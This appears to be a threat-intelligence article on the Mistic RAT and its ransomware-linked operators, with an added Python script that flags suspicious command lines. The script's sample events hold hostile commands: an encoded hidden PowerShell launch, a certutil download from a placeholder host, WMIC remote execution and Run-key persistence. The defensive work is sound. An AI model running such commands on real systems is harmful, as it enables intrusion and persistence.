Mistic RAT: New Cybersecurity Threat Linked to Multiple Ransomware Families
A new remote access trojan linked to multiple ransomware operations has emerged as a key tool in recent cyberattacks, according to findings from Broadcom's Symantec and Carbon Black threat research teams.
Threat Group and Tactics
The threat group, identified as Woodgnat and KongTuke, has been active since at least May 2024 and is associated with ransomware families including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Since April 2026, the actors have deployed the Backdoor.Mistic RAT against organizations in sectors such as education, insurance, IT, and professional services. Earlier attacks involved the ModeloRAT, but the shift to Mistic marks a significant evolution in their tactics.
Tools and Techniques
The threat group employs a broad targeting strategy, favoring opportunistic breaches over specific industries. Researchers note that the attackers first cast a wide net to gain access, then evaluate which victims offer the highest value for resale. The Mistic RAT, also known as MLTBackdoor, provides standard RAT capabilities such as file manipulation, data exfiltration, and system reconnaissance. The attackers execute the malware as a dynamic-link library (DLL) via DLL sideloading. In one instance, they paired Mistic with a credential-stealing module to extend their access.
Social Engineering and Lures
Additional tools observed during intrusions include Curl, Reg.exe, Net (net.exe), PowerShell, Certutil, and WMIC. These built-in utilities are used for data transfer, registry modification, network management, command execution, and lateral movement across compromised systems. The group's methods rely heavily on social engineering, with techniques such as ClickFix, FileFix, and CrashFix designed to trick users into running malicious PowerShell commands themselves.
Technical Analysis and Stages
Researchers highlight that while initial compromises may appear random, the actors conduct detailed system profiling to determine the worth of stolen access before selling it to third parties. Since April 2026, the threat group has also utilized helpdesk and IT-support lures distributed through Microsoft Teams to entice victims into executing malicious payloads. This approach leverages trusted communication channels to bypass traditional security measures.
Implications and Recommendations
The actors have previously used compromised WordPress sites to distribute malware, further widening their delivery channels. Technical analysis shows that the group's operations proceed in multiple stages, beginning with initial access and progressing to data extraction and, potentially, ransomware deployment. The reliance on widely available system tools such as PowerShell and WMIC underscores how hard such intrusions are to detect by conventional means. Researchers emphasize the importance of monitoring for unusual command-line activity and unauthorized use of administrative utilities.
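As a concrete starting point for the command-line monitoring recommended above, here is an added illustration (not Symantec's or Carbon Black's detection logic): a small Python triage over constructed process-creation events that flags the utilities the article lists when they are used in the ways it describes (pasted PowerShell lures, Certutil and Curl downloads, WMIC remote execution, Reg.exe Run-key persistence, DLL sideloading from user-writable paths). The field names, regex patterns and sample values are assumptions of this example and would need tuning for a real environment.

```python
import re

# Each rule: (name, parent-image regex or None, command-line regex). The tool list
# comes from the article; the exact patterns are this example's assumptions, not
# vendor signatures, and are deliberately narrow to keep false positives low.
RULES = [
    # ClickFix/FileFix-style lures end with the user pasting a command, so the
    # shell is spawned by explorer.exe rather than by a script host or admin tool.
    ("user_launched_powershell", r"explorer\.exe$",
     r"powershell.*(-e(nc|ncodedcommand)?\b|-w\s+hidden|\biex\b|downloadstring|invoke-webrequest)"),
    ("certutil_download_or_decode", None, r"certutil.*(-urlcache|-decode)"),
    ("curl_to_user_writable", None,
     r"\bcurl(\.exe)?\b.*(-o|--output)\s+\S*(\\users\\|\\programdata\\|\\temp\\)"),
    ("wmic_remote_process", None, r"wmic.*/node:.*process\s+call\s+create"),
    ("net_group_or_account_change", None, r"\bnet1?(\.exe)?\s+(group|localgroup|user)\b.*(/add|/domain)"),
    ("reg_run_key_persistence", None, r"reg(\.exe)?\s+add\b.*currentversion\\run"),
    ("rundll32_user_path_dll", None, r"rundll32.*\\users\\.*\.dll"),
]
COMPILED = [(n, re.compile(p, re.I) if p else None, re.compile(c, re.I)) for n, p, c in RULES]


def triage(events):
    """Return (event_index, rule_name) pairs for every rule an event matches.
    Events are dicts with 'parent', 'image' and 'cmdline' (Sysmon Event ID 1-like fields)."""
    hits = []
    for i, ev in enumerate(events):
        for name, parent_re, cmd_re in COMPILED:
            if parent_re and not parent_re.search(ev["parent"]):
                continue
            if cmd_re.search(ev["cmdline"]):
                hits.append((i, name))
    return hits


# Constructed sample events (not real telemetry); hosts, paths and encoded text are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc QUJD"},                                   # pasted lure command
    {"parent": r"C:\Windows\System32\svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},                       # scheduled task, benign
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": r"certutil -urlcache -split -f https://cdn.example.invalid/u.dat C:\Users\Public\u.dat"},
    {"parent": "cmd.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32 C:\Users\jdoe\AppData\Local\Temp\helper.dll,Start"},     # DLL from user path
    {"parent": "cmd.exe", "image": "net.exe", "cmdline": r"net use Z: \\fileserver\share"},  # routine
    {"parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": 'wmic /node:WS-0042 process call create "cmd /c whoami"'},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\Users\Public\u.exe"},
]

if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

Events 1 and 4 (a scheduled-task script and a routine drive mapping) produce no hits, which is the point of anchoring the PowerShell rule on the parent process and the Net rule on account or group changes rather than on the binary name alone.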
Initial Access Brokers and Security Measures
The emergence of Mistic highlights the growing sophistication of initial access brokers, who act as intermediaries between intrusion operators and ransomware groups. By supplying access to already-compromised systems, these brokers let ransomware operators maximize their financial gains while minimizing their own direct exposure. The persistence of this model underscores the need for organizations to strengthen endpoint security, enforce strict access controls, and conduct regular threat hunting exercises.
